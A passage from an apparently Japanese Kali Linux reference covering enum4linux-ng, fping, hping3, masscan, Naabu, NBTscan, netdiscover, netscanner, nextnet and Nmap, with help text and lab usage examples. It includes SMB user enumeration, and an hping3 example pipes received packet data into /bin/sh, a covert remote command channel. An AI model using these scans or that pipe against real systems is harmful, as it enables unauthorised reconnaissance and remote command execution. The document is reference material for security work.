[-p PW | -K TICKET_FILE | -H NTHASH] [--local-auth] [-d] [-k USERS] [-r RANGES] [-s SHARES_FILE] [-t TIMEOUT] [-v] [--keep]
[-oJ OUT_JSON_FILE | -oY OUT_YAML_FILE | -oA OUT_FILE]
host
[...]
positional arguments:
host
options:
-h, --help show this help message and exit
-A Do all simple enumeration including nmblookup (-U -G -S -P -O -N -I -L). This option is enabled if you don\'t provide any other option.
-As Do all simple short enumeration without NetBIOS names lookup (-U -G -S -P -O -I -L)
-U Get users via RPC
-G Get groups via RPC
-Gm Get groups with group members via RPC
-S Get shares via RPC
-C Get services via RPC
-P Get password policy information via RPC
-O Get OS information via RPC
-L Get additional domain info via LDAP/LDAPS (for DCs only)
-I Get printer information via RPC
-R [BULK_SIZE] Enumerate users via RID cycling. Optionally, specifies lookup request size.
-N Do an NetBIOS names lookup (similar to nbtstat) and try to retrieve workgroup from output
-w DOMAIN Specify workgroup/domain manually (usually found automatically)
-u USER Specify username to use (default "")
-p PW Specify password to use (default "")
-K TICKET_FILE Try to authenticate with Kerberos, only useful in Active Directory environment
-H NTHASH Try to authenticate with hash
--local-auth Authenticate locally to target
-d Get detailed information for users and groups, applies to -U, -G and -R
-k USERS User(s) that exists on remote system (default: administrator,guest,krbtgt,domain admins,root,bin,none). Used to get sid with "lookupsids"
-r RANGES RID ranges to enumerate (default: 500-550,1000-1050)
-s SHARES_FILE Brute force guessing for shares
-t TIMEOUT Sets connection timeout in seconds (default: 5s)
-v Verbose, show full samba tools commands being run (net, rpcclient, etc.)
--keep Don\'t delete the Samba configuration file created during tool run after enumeration (useful with -v)
-oJ OUT_JSON_FILE Writes output to JSON file (extension is added automatically)
-oY OUT_YAML_FILE Writes output to YAML file (extension is added automatically)
-oA OUT_FILE Writes output to YAML and JSON file (extensions are added automatically)
■ 使用例
root@kali:~# enum4linux-ng 192.168.11.4
ENUM4LINUX - next generation (v1.3.4)
[...]
===================================
| Listener Scan on 192.168.11.4 |
===================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
[...]
=======================================
| SMB Dialect Check on 192.168.11.4 |
=======================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: true
SMB 2.02: false
SMB 2.1: false
SMB 3.0: false
SMB 3.1.1: false
Preferred dialect: SMB 1.0
SMB1 only: true
SMB signing required: false
[*] Enforcing legacy SMBv1 for further enumeration
[...]
=============================================
| OS Information via RPC for 192.168.11.4 |
=============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 3.0.20-Debian)
OS version: '4.9'
OS release: not supported
OS build: not supported
Native OS: Unix
Native LAN manager: Samba 3.0.20-Debian
Platform id: '500'
Server type: '0x9a03'
Server type string: Wk Sv PrQ Unx NT SNT f4f5ef5b7e57 server (Samba 3.0.20-Debian)
===================================
| Users via RPC on 192.168.11.4 |
===================================
[*] Enumerating users via 'querydispinfo'
[+] Found 35 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 35 user(s) via 'enumdomusers'
[+] After merging user results we have 35 user(s) total:
'1000':
username: root
name: root
acb: '0x00000011'
description: (null)
'1002':
username: daemon
name: daemon
acb: '0x00000011'
description: (null)
[...]
fping
任意の数のターゲットを指定してpingを送信することができます。
■ 使用方法
root@kali:~# fping --help
Usage: fping [options] [targets...]
Probing options:
-4, --ipv4 only ping IPv4 addresses
-6, --ipv6 only ping IPv6 addresses
-b, --size=BYTES amount of ping data to send, in bytes (default: 56)
-B, --backoff=N set exponential backoff factor to N (default: 1.5)
-c, --count=N count mode: send N pings to each target
-f, --file=FILE read list of targets from a file ( - means stdin)
-g, --generate generate target list (only if no -f specified)
(give start and end IP in the target list, or a CIDR address)
(ex. fping -g 192.168.1.0 192.168.1.255 or fping -g 192.168.1.0/24)
-H, --ttl=N set the IP TTL value (Time To Live hops)
-I, --iface=IFACE bind to a particular interface
-l, --loop loop mode: send pings forever
-m, --all use all IPs of provided hostnames (e.g. IPv4 and IPv6), use with -A
-M, --dontfrag set the Don\'t Fragment flag
-O, --tos=N set the type of service (tos) flag on the ICMP packets
-p, --period=MSEC interval between ping packets to one target (in ms)
(in loop and count modes, default: 1000 ms)
-r, --retry=N number of retries (default: 3)
-R, --random random packet data (to foil link data compression)
-S, --src=IP set source address
-t, --timeout=MSEC individual target initial timeout (default: 500 ms,
except with -l/-c/-C, where it\'s the -p period up to 2000 ms)
Output options:
-a, --alive show targets that are alive
-A, --addr show targets by address
-C, --vcount=N same as -c, report results in verbose format
-d, --rdns show targets by name (force reverse-DNS lookup)
-D, --timestamp print timestamp before each output line
-e, --elapsed show elapsed time on return packets
-i, --interval=MSEC interval between sending ping packets (default: 10 ms)
-n, --name show targets by name (reverse-DNS lookup for target IPs)
-N, --netdata output compatible for netdata (-l -Q are required)
-o, --outage show the accumulated outage time (lost packets * packet interval)
-q, --quiet quiet (don\'t show per-target/per-ping results)
-Q, --squiet=SECS same as -q, but add interval summary every SECS seconds
-s, --stats print final stats
-u, --unreach show targets that are unreachable
-v, --version show version
-x, --reachable=N shows if >=N hosts are reachable or not
■ 使用例
root@kali:~# fping -g 192.168.11.0/24
192.168.11.1 is alive
192.168.11.3 is alive
192.168.11.4 is alive
hping3
カスタムICMP/UDP/TCPパケットを送信し、ターゲットのリプライを表示します。
■ 使用方法
root@kali:~# hping3 --help
usage: hping3 host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don\'t show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
-V --verbose verbose mode
-D --debug debugging info
-z --bind bind ctrl+z to ttl (default to dst port)
-Z --unbind unbind ctrl+z
--beep beep for every matching packet received
Mode
default mode TCP
-0 --rawip RAW IP mode
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan SCAN mode.
Example: hping --scan 1-30,70-90 -S www.target.host
-9 --listen listen mode
IP
-a --spoof spoof source address
--rand-dest random destionation address mode. see the man.
--rand-source random source address mode. see the man.
-t --ttl ttl (default 64)
-N --id id (default random)
-W --winid use win* id byte ordering
-r --rel relativize id field (to estimate host traffic)
-f --frag split packets in more frag. (may pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set don\'t fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if packet size > mtu
-o --tos type of service (default 0x00), try --tos help
-G --rroute includes RECORD_ROUTE option and display the route buffer
--lsrr loose source routing and record route
--ssrr strict source routing and record route
-H --ipproto set the IP protocol field, only in RAW IP mode
ICMP
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
--force-icmp send all icmp types (default send only supported types)
--icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
--icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
--icmp-help display help for others icmp options
UDP/TCP
-s --baseport base source port (default random)
-p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum
many systems will fix the IP checksum sending the packet
so you\'ll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
--tcpexitcode use last tcp->th_flags as exit code
--tcp-mss enable the TCP MSS option with the given value
--tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
Common
-d --data data size (default is 0)
-E --file data from file
-e --sign add 'signature'
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable 'safe' protocol
-u --end tell you when --file reached EOF and prevent rewind
-T --traceroute traceroute mode (implies --bind and --ttl 1)
--tr-stop Exit when receive the first not ICMP in traceroute mode
--tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
--tr-no-rtt Don\'t calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
--apd-send Send the packet described with APD (see docs/APD.txt)
■ 使用例
# 80番ポートに対するACKスキャンで疎通確認を行う(FWでICMPパケットがブロックされている場合など)
root@kali:~# hping3 -c 3 -A -p 80 192.168.11.4
HPING 192.168.11.4 (eth0 192.168.11.4): A set, 40 headers + 0 data bytes
len=40 ip=192.168.11.4 ttl=64 DF id=0 sport=80 flags=R seq=0 win=0 rtt=16.2 ms
len=40 ip=192.168.11.4 ttl=64 DF id=0 sport=80 flags=R seq=1 win=0 rtt=16.0 ms
len=40 ip=192.168.11.4 ttl=64 DF id=0 sport=80 flags=R seq=2 win=0 rtt=15.4 ms
--- 192.168.11.4 hping statistic ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 15.4/15.9/16.2 ms
------------------------------
# リッスンモードでパケットをスニッフィング
root@kali:~# hping3 --listen HTTP --interface eth0
hping3 listen mode
# HTTPリクエストを送信
root@kali:~# curl http://192.168.11.4
# HTTPという文字以降の送受信データが表示される
root@kali:~# hping3 --listen HTTP --interface eth0
hping3 listen mode
/1.1
Host: 192.168.11.4
User-Agent: curl/8.9.1
Accept: */*
/1.1 200 OK
Date: Mon, 14 Oct 2024 11:28:04 GMT
Server: Apache/2.4.62 (Unix)
Last-Modified: Mon, 11 Jun 2007 18:53:14 GMT
ETag: "2d-432a5e4a73a80"
Accept-Ranges: bytes
Content-Length: 45
Content-Type: text/html
<html><body><h1>It works!</h1></body></html>
------------------------------
# [ホスト1]リッスンモードでパケットをスニッフィング
root@kali_1:~# hping3 --listen hello --interface eth0 | /bin/sh
hping3 listen mode
root@kali_2:~# echo ls > test.cmd
# [ホスト2]ホスト1の53番ポートに対してデータを送信
root@kali_2:~# hping3 192.168.11.3 -c 1 -p 53 -d 100 --sign hello --file test.cmd
HPING 192.168.11.3 (eth0 192.168.11.3): NO FLAGS are set, 40 headers + 100 data bytes
len=40 ip=192.168.11.3 ttl=64 DF id=0 sport=53 flags=RA seq=0 win=0 rtt=7.1 ms
--- 192.168.11.3 hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 7.1/7.1/7.1 ms
# [ホスト1]受信したデータをコマンド(lsコマンド)として実行
root@kali_1:~# hping3 --listen hello --interface eth0 | /bin/sh
hping3 listen mode
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
------------------------------
# ターゲットの80番ポートにSYNパケットを送信するスクリプトを作成
root@kali_1:~# vi example.htcl
set target 192.168.11.4
set myaddr 192.168.11.3
set syn {}
append syn "ip(saddr=$myaddr,daddr=$target,ttl=255)"
append syn "+tcp(sport=123,dport=80,flags=s)"
hping send $syn
# スクリプトを実行
root@kali_1:~# hping3 exec example.htcl
root@kali_2:~# tcpdump -n -i eth0
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
13:46:06.373816 IP 192.168.11.3.123 > 192.168.11.4.80: Flags [S], seq 0, win 0, length 0
13:46:06.373844 IP 192.168.11.4.80 > 192.168.11.3.123: Flags [R.], seq 0, ack 1, win 0, length 0
MASSCAN
大量のホストのポートを高速でスキャンします。
■ 使用方法
root@kali:~# man masscan
SYNOPSIS
masscan <ip addresses/ranges> -p ports options
OPTIONS
• <ip/range>: anything on the command-line not prefixed with a ´-´ is assumed to be an IP address or range. There are three valid for‐
mats. The first is a single IPv4 address like "192.168.0.1". The second is a range like "10.0.0.1-10.0.0.100". The third is a CIDR
address, like "0.0.0.0/0". At least one target must be specified. Multiple targets can be specified. This can be specified as multi‐
ple options separated by space, or can be separated by a comma as a single option, such as 10.0.0.0/8,192.168.0.1.
• --range <ip/range>: the same as target range spec described above, except as a named parameter instead of an unnamed one.
• -p <ports, --ports <ports>: specifies the port(s) to be scanned. A single port can be specified, like -p80. A range of ports can be
specified, like -p 20-25. A list of ports/ranges can be specified, like -p80,20-25. UDP ports can also be specified, like --ports
U:161,U:1024-1100.
• --banners: specifies that banners should be grabbed, like HTTP server versions, HTML title fields, and so forth. Only a few proto‐
cols are supported.
• --rate <packets-per-second>: specifies the desired rate for transmitting packets. This can be very small numbers, like 0.1 for
transmitting packets at rates of one every 10 seconds, for very large numbers like 10000000, which attempts to transmit at 10 mil‐
lion packets/second. In my experience, Windows and can do 250 thousand packets per second, and latest versions of Linux can do 2.5
million packets per second. The PF_RING driver is needed to get to 25 million packets/second.
• -c <filename>, --conf <filename>: reads in a configuration file. The format of the configuration file is described below.
• --resume <filename>: the same as --conf, except that a few options are automatically set, such as --append-output. The format of the
configuration file is described below.
• --echo: don´t run, but instead dump the current configuration to a file. This file can then be used with the -c option. The format
of this output is described below under ´CONFIGURATION FILE´.
• -e <ifname>, --adapter <ifname>: use the named raw network interface, such as "eth0" or "dna1". If not specified, the first network
interface found with a default gateway will be used.
• --adapter-ip <ip-address>: send packets using this IP address. If not specified, then the first IP address bound to the network in‐
terface will be used. Instead of a single IP address, a range may be specified. NOTE: The size of the range must be an even power of
2, such as 1, 2, 4, 8, 16, 1024 etc. addresses.
• --adapter-port <port>: send packets using this port number as the source. If not specified, a random port will be chosen in the
range 40000 through 60000. This port should be filtered by the host firewall (like iptables) to prevent the host network stack from
interfering with arriving packets. Instead of a single port, a range can be specified, like 40000-40003. NOTE: The size of the range
must be an even power of 2, such as the example above that has a total of 4 addresses.
• --adapter-mac <mac-address>: send packets using this as the source MAC address. If not specified, then the first MAC address bound
to the network interface will be used.
• --router-mac <mac address>: send packets to this MAC address as the destination. If not specified, then the gateway address of the
network interface will be ARPed.
• --ping: indicates that the scan should include an ICMP echo request. This may be included with TCP and UDP scanning.
• --exclude <ip/range>: blacklist an IP address or range, preventing it from being scanned. This overrides any target specification,
guaranteeing that this address/range won´t be scanned. This has the same format as the normal target specification.
• --excludefile <filename>: reads in a list of exclude ranges, in the same target format described above. These ranges override any
targets, preventing them from being scanned.
• --append-output: causes output to append to file, rather than overwriting the file.
• --iflist: list the available network interfaces, and then exits.
• --retries: the number of retries to send, at 1 second intervals. Note that since this scanner is stateless, retries are sent regard‐
less if replies have already been received.
• --nmap: print help about nmap-compatibility alternatives for these options.
• --pcap-payloads: read packets from a libpcap file containing packets and extract the UDP payloads, and associate those payloads with
the destination port. These payloads will then be used when sending UDP packets with the matching destination port. Only one payload
will be remembered per port. Similar to --nmap-payloads.
• --nmap-payloads <filename>: read in a file in the same format as the nmap file nmap-payloads. This contains UDP payload, so that we
can send useful UDP packets instead of empty ones. Similar to --pcap-payloads.
• --http-user-agent <user-agent>: replaces the existing user-agent field with the indicated value when doing HTTP requests.
• --open-only: report only open ports, not closed ports.
• --pcap <filename>: saves received packets (but not transmitted packets) to the libpcap-format file.
• --packet-trace: prints a summary of those packets sent and received. This is useful at low rates, like a few packets per second, but
will overwhelm the terminal at high rates.
• --pfring: force the use of the PF_RING driver. The program will exit if PF_RING DNA drvers are not available.
• --resume-index: the point in the scan at when it was paused.
• --resume-count: the maximum number of probes to send before exiting. This is useful with the --resume-index to chop up a scan and
split it among multiple instances, though the --shards option might be better.
• --shards <x>/<y>: splits the scan among instances. x is the id for this scan, while y is the total number of instances. For example,
--shards 1/2 tells an instance to send every other packet, starting with index 0. Likewise, --shards 2/2 sends every other packet,
but starting with index 1, so that it doesn´t overlap with the first example.
• --rotate <time>: rotates the output file, renaming it with the current timestamp, moving it to a separate directory. The time is
specified in number of seconds, like "3600" for an hour. Or, units of time can be specified, such as "hourly", or "6hours", or
"10min". Times are aligned on an even boundary, so if "daily" is specified, then the file will be rotated every day at midnight.
• --rotate-offset <time>: an offset in the time. This is to accommodate timezones.
• --rotate-dir <directory>: when rotating the file, this specifies which directory to move the file to. A useful directory is
/var/log/masscan.
• --seed <integer>: an integer that seeds the random number generator. Using a different seed will cause packets to be sent in a dif‐
ferent random order. Instead of an integer, the string time can be specified, which seeds using the local timestamp, automatically
generating a different random order of scans. If no seed specified, time is the default.
• --regress: run a regression test, returns ´0´ on success and ´1´ on failure.
• --ttl <num>: specifies the TTL of outgoing packets, defaults to 255.
• --wait <seconds>: specifies the number of seconds after transmit is done to wait for receiving packets before exiting the program.
The default is 10 seconds. The string forever can be specified to never terminate.
• --offline: don´t actually transmit packets. This is useful with a low rate and --packet-trace to look at what packets might´ve been
transmitted. Or, it´s useful with --rate 100000000 in order to benchmark how fast transmit would work (assuming a zero-overhead dri‐
ver). PF_RING is about 20% slower than the benchmark result from offline mode.
• -sL: this doesn´t do a scan, but instead creates a list of random addresses. This is useful for importing into other tools. The op‐
tions --shard, --resume-index, and --resume-count can be useful with this feature.
• --interactive: show the results in realtime on the console. It has no effect if used with --output-format or --output-filename.
• --output-format <fmt>: indicates the format of the output file, which can be xml, binary, grepable, list, or JSON. The option --out‐
put-filename must be specified.
• --output-filename <filename>: the file which to save results to. If the parameter --output-format is not specified, then the default
of xml will be used.
• -oB <filename>: sets the output format to binary and saves the output in the given filename. This is equivelent to using the --out‐
put-format and --output-filename parameters. The option --readscan can then be used to read the binary file. Binary files are much
smaller than their XML equivelents, but require a separate step to convert back into XML or another readable format.
• -oX <filename>: sets the output format to XML and saves the output in the given filename. This is equivelent to using the --out‐
put-format xml and --output-filename parameters.
• -oG <filename>: sets the output format to grepable and saves the output in the given filename. This is equivelent to using the
--output-format grepable and --output-filename parameters.
• -oJ <filename>: sets the output format to JSON and saves the output in the given filename. This is equivelent to using the --out‐
put-format json and --output-filename parameters.
• -oL <filename>: sets the output format to a simple list format and saves the output in the given filename. This is equivelent to us‐
ing the --output-format list and --output-filename parameters.
• --readscan <binary-files>: reads the files created by the -oB option from a scan, then outputs them in one of the other formats, de‐
pending on command-line parameters. In other words, it can take the binary version of the output and convert it to an XML or JSON
format.
■ 使用例
root@kali:~# masscan 192.168.11.0/24 -p 20-25
Starting masscan 1.3.9-integration (http://bit.ly/14GZzcT) at 2024-12-10 02:30:09 GMT
Initiating SYN Stealth Scan
Scanning 256 hosts [1 port/host]
Discovered open port 21/tcp on 192.168.11.4
Discovered open port 25/tcp on 192.168.11.4
Discovered open port 23/tcp on 192.168.11.4
Discovered open port 22/tcp on 192.168.11.4
Naabu
ホスト/ホストのリストに対してSYN/CONNECT/UDPスキャンを高速に実行し、応答を返すポートをリストアップします。
■ 使用方法
root@kali:~# naabu --help
Naabu is a port scanning tool written in Go that allows you to enumerate open ports for hosts in a fast and reliable manner.
Usage:
naabu [flags]
Flags:
INPUT:
-host string[] hosts to scan ports for (comma-separated)
-list, -l string list of hosts to scan ports (file)
-exclude-hosts, -eh string hosts to exclude from the scan (comma-separated)
-exclude-file, -ef string list of hosts to exclude from scan (file)
PORT:
-port, -p string ports to scan (80,443, 100-200)
-top-ports, -tp string top ports to scan (default 100) [full,100,1000]
-exclude-ports, -ep string ports to exclude from scan (comma-separated)
-ports-file, -pf string list of ports to scan (file)
-port-threshold, -pts int port threshold to skip port scan for the host
-exclude-cdn, -ec skip full port scans for CDN/WAF (only scan for port 80,443)
-display-cdn, -cdn display cdn in use
RATE-LIMIT:
-c int general internal worker threads (default 25)
-rate int packets to send per second (default 1000)
UPDATE:
-up, -update update naabu to latest version
-duc, -disable-update-check disable automatic naabu update check
OUTPUT:
-o, -output string file to write output to (optional)
-j, -json write output in JSON lines format
-csv write output in csv format
CONFIGURATION:
-config string path to the naabu configuration file (default $HOME/.config/naabu/config.yaml)
-scan-all-ips, -sa scan all the IP\'s associated with DNS record
-ip-version, -iv string[] ip version to scan of hostname (4,6) - (default 4) (default ["4"])
-scan-type, -s string type of port scan (SYN/CONNECT) (default "s")
-source-ip string source ip and port (x.x.x.x:yyy - might not work on OSX)
-interface-list, -il list available interfaces and public ip
-interface, -i string network Interface to use for port scan
-nmap invoke nmap scan on targets (nmap must be installed) - Deprecated
-nmap-cli string nmap command to run on found results (example: -nmap-cli 'nmap -sV')
-r string list of custom resolver dns resolution (comma separated or from file)
-proxy string socks5 proxy (ip[:port] / fqdn[:port]
-proxy-auth string socks5 proxy authentication (username:password)
-resume resume scan using resume.cfg
-stream stream mode (disables resume, nmap, verify, retries, shuffling, etc)
-passive display passive open ports using shodan internetdb api
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-no-stdin Disable Stdin processing
HOST-DISCOVERY:
-sn, -host-discovery Perform Only Host Discovery
-Pn, -skip-host-discovery Skip Host discovery
-ps, -probe-tcp-syn string[] TCP SYN Ping (host discovery needs to be enabled)
-pa, -probe-tcp-ack string[] TCP ACK Ping (host discovery needs to be enabled)
-pe, -probe-icmp-echo ICMP echo request Ping (host discovery needs to be enabled)
-pp, -probe-icmp-timestamp ICMP timestamp request Ping (host discovery needs to be enabled)
-pm, -probe-icmp-address-mask ICMP address mask request Ping (host discovery needs to be enabled)
-arp, -arp-ping ARP ping (host discovery needs to be enabled)
-nd, -nd-ping IPv6 Neighbor Discovery (host discovery needs to be enabled)
-rev-ptr Reverse PTR lookup for input ips
SERVICES-DISCOVERY:
-sD, -service-discovery Service Discovery
-sV, -service-version Service Version
OPTIMIZATION:
-retries int number of retries for the port scan (default 3)
-timeout int millisecond to wait before timing out (default 1000)
-warm-up-time int time in seconds between scan phases (default 2)
-ping ping probes for verification of host
-verify validate the ports again with TCP verification
DEBUG:
-health-check, -hc run diagnostic check up
-debug display debugging information
-verbose, -v display verbose output
-no-color, -nc disable colors in CLI output
-silent display only results in output
-version display version of naabu
-stats display stats of the running scan (deprecated)
-si, -stats-interval int number of seconds to wait between showing a statistics update (deprecated) (default 5)
-mp, -metrics-port int port to expose naabu metrics on (default 63636)
■ 使用例
root@kali:~# naabu -host 192.168.11.4
[INF] Current naabu version 2.3.1 (latest)
[INF] Running host discovery scan
[INF] Running SYN scan with CAP_NET_RAW privileges
192.168.11.4:5900
192.168.11.4:111
192.168.11.4:80
192.168.11.4:514
192.168.11.4:2121
192.168.11.4:445
192.168.11.4:25
192.168.11.4:23
192.168.11.4:513
192.168.11.4:21
192.168.11.4:3306
192.168.11.4:6000
192.168.11.4:8009
192.168.11.4:22
192.168.11.4:139
192.168.11.4:5432
[INF] Found 16 ports on host 192.168.11.4 (192.168.11.4)
# 開いているポートに対するサービス検出を実行
root@kali:~# naabu -host 192.168.11.4 -silent | fingerprintx -f
mysql://192.168.11.4:3306
smtp://192.168.11.4:25
ssh://192.168.11.4:22
ftp://192.168.11.4:21
postgresql://192.168.11.4:5432
vnc://192.168.11.4:5900
rpc://192.168.11.4:111
telnet://192.168.11.4:23
http://192.168.11.4:80
NBTscan
ネットワークをスキャンしてNetBIOS情報を表示します。
■ 使用方法
root@kali:~# nbtscan
Usage:
nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename)|(<scan_range>)
-v verbose output. Print all names received
from each host
-d dump packets. Print whole packet contents.
-e Format output in /etc/hosts format.
-l Format output in lmhosts format.
Cannot be used with -v, -s or -h options.
-t timeout wait timeout milliseconds for response.
Default 1000.
-b bandwidth Output throttling. Slow down output
so that it uses no more that bandwidth bps.
Useful on slow links, so that ougoing queries
don\'t get dropped.
-r use local port 137 for scans. Win95 boxes
respond to this only.
You need to be root to use this option on Unix.
-q Suppress banners and error messages,
-s separator Script-friendly output. Don\'t print
column and record headers, separate fields with separator.
-h Print human-readable names for services.
Can only be used with -v option.
-m retransmits Number of retransmits. Default 0.
-f filename Take IP addresses to scan from file filename.
-f - makes nbtscan take IP addresses from stdin.
<scan_range> what to scan. Can either be single IP
like 192.168.1.1 or
range of addresses in one of two forms:
xxx.xxx.xxx.xxx/xx or xxx.xxx.xxx.xxx-xxx.
■ 使用例
root@kali:~# nbtscan -v -s : 192.168.11.4
192.168.11.4:600E54EA9E5E :00U
192.168.11.4:600E54EA9E5E :03U
192.168.11.4:600E54EA9E5E :20U
192.168.11.4:600E54EA9E5E :00U
192.168.11.4:600E54EA9E5E :03U
192.168.11.4:600E54EA9E5E :20U
192.168.11.4:__MSBROWSE__:01G
192.168.11.4:WORKGROUP :00G
192.168.11.4:WORKGROUP :1dU
192.168.11.4:WORKGROUP :1eG
192.168.11.4:WORKGROUP :00G
192.168.11.4:WORKGROUP :1dU
192.168.11.4:WORKGROUP :1eG
192.168.11.4:MAC:dc:fb:48:75:75:0b
nbtscan(unixwiz)
ネットワークをスキャンしてNetBIOS情報を表示します。
■ 使用方法
root@kali:~# nbtscan-unixwiz
usage: nbtscan-unixwiz [options] target [targets...]
Targets are lists of IP addresses, DNS names, or address
ranges. Ranges can be in /nbits notation ("192.168.12.0/24")
or with a range in the last octet ("192.168.12.64-97")
-V show Version information
-f show Full NBT resource record responses (recommended)
-H generate HTTP headers
-v turn on more Verbose debugging
-n No looking up inverse names of IP addresses responding
-p <n> bind to UDP Port <n> (default=0)
-m include MAC address in response (implied by '-f')
-T <n> Timeout the no-responses in <n> seconds (default=2 secs)
-w <n> Wait <n> msecs after each write (default=10 ms)
-t <n> Try each address <n> tries (default=1)
-P generate results in perl hashref format
■ 使用例
root@kali:~# nbtscan-unixwiz -f 192.168.11.4
192.168.11.4 WORKGROUP\600E54EA9E5E SHARING
600E54EA9E5E <00> UNIQUE Workstation Service
600E54EA9E5E <03> UNIQUE Messenger Service<3>
600E54EA9E5E <20> UNIQUE File Server Service
..__MSBROWSE__.<01> GROUP Master Browser
WORKGROUP <00> GROUP Domain Name
WORKGROUP <1d> UNIQUE Master Browser
WORKGROUP <1e> GROUP Browser Service Elections
dc:fb:48:75:75:0b ETHER server4test.local-net
Netdiscover
ネットワーク内にarpリクエストを送信してネットワークアドレスを検出します。
■ 使用方法
root@kali:~# netdiscover -h
Usage: netdiscover [-i device] [-r range | -l file | -p] [-m file] [-F filter] [-s time] [-c count] [-n node] [-dfPLNS]
-i device: your network device
-r range: scan a given range instead of auto scan. 192.168.6.0/24,/16,/8
-l file: scan the list of ranges contained into the given file
-p passive mode: do not send anything, only sniff
-m file: scan a list of known MACs and host names
-F filter: customize pcap filter expression (default: "arp")
-s time: time to sleep between each ARP request (milliseconds)
-c count: number of times to send each ARP request (for nets with packet loss)
-n node: last source IP octet used for scanning (from 2 to 253)
-d ignore home config files for autoscan and fast mode
-f enable fastmode scan, saves a lot of time, recommended for auto
-P print results in a format suitable for parsing by another program and stop after active scan
-L similar to -P but continue listening after the active scan is completed
-N Do not print header. Only valid when -P or -L is enabled.
-S enable sleep time suppression between each request (hardcore mode)
If -r, -l or -p are not enabled, netdiscover will scan for common LAN addresses.
■ 使用例
root@kali:~# netdiscover -i eth0 -r 192.168.11.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
6 Captured ARP Req/Rep packets, from 4 hosts. Total size: 360
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.11.1 d4:2c:46:be:0f:60 3 180 BUFFALO.INC
192.168.11.4 dc:a2:66:20:35:65 1 60 Hon Hai Precision Ind., Co., Ltd.
192.168.11.3 dc:fb:48:75:75:0b 1 60 Intel Corporate
192.168.11.5 68:9a:87:cb:db:8a 1 60 Amazon Technologies Inc.
netscanner
ネットワーク内のホストの検出、パケットダンプやポートのスキャンなどをGUIのようなインターフェースから行うことが出来ます。
■ 使用方法
root@kali:~# netscanner --help
Usage: netscanner [OPTIONS]
Options:
-t, --tick-rate <FLOAT> Tick rate, i.e. number of ticks per second [default: 1]
-f, --frame-rate <FLOAT> Frame rate, i.e. number of frames per second [default: 10]
-h, --help Print help
-V, --version Print version
■ 使用例
root@kali:~# netscanner
コマンドを実行するとCLI上にGUI風の画面が表示される
画面を切り替えてパケットのダンプやポートスキャンの結果などを確認可能
nextnet
ネットワーク上のNetBIOSが起動しているホストを探索します。
■ 使用方法
root@kali:~# nextnet --help
Usage: nextnet [cidr] ... [cidr]
Options:
-rate int
Set the maximum packets per second rate (default 1000)
-version
Show the application version
■ 使用例
root@kali:~# nextnet 192.168.11.0/24
{"host":"192.168.11.4","port":"137","proto":"udp","probe":"netbios","name":"B776FBD9255F","nets":["192.168.11.4"],"info":{"domain":"WORKGROUP"}}
Nmap
多くのポートスキャン技術、バージョン検出、TCP/IPフィンガープリントをサポートしたネットワークスキャナーです。
■ 使用方法
root@kali:~# nmap
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL <inputfilename>: Input from list of hosts/networks
-iR <num hosts>: Choose random targets
--exclude <host1[,host2][,host3],...>: Exclude hosts/networks
--excludefile <exclude_file>: Exclude list from file
HOST DISCOVERY:
-sL: List Scan - simply list targets to scan
-sn: Ping Scan - disable port scan
-Pn: Treat all hosts as online -- skip host discovery
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol Ping
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
--dns-servers <serv1[,serv2],...>: Specify custom DNS servers
--system-dns: Use OS\'s DNS resolver
--traceroute: Trace hop path to each host
SCAN TECHNIQUES:
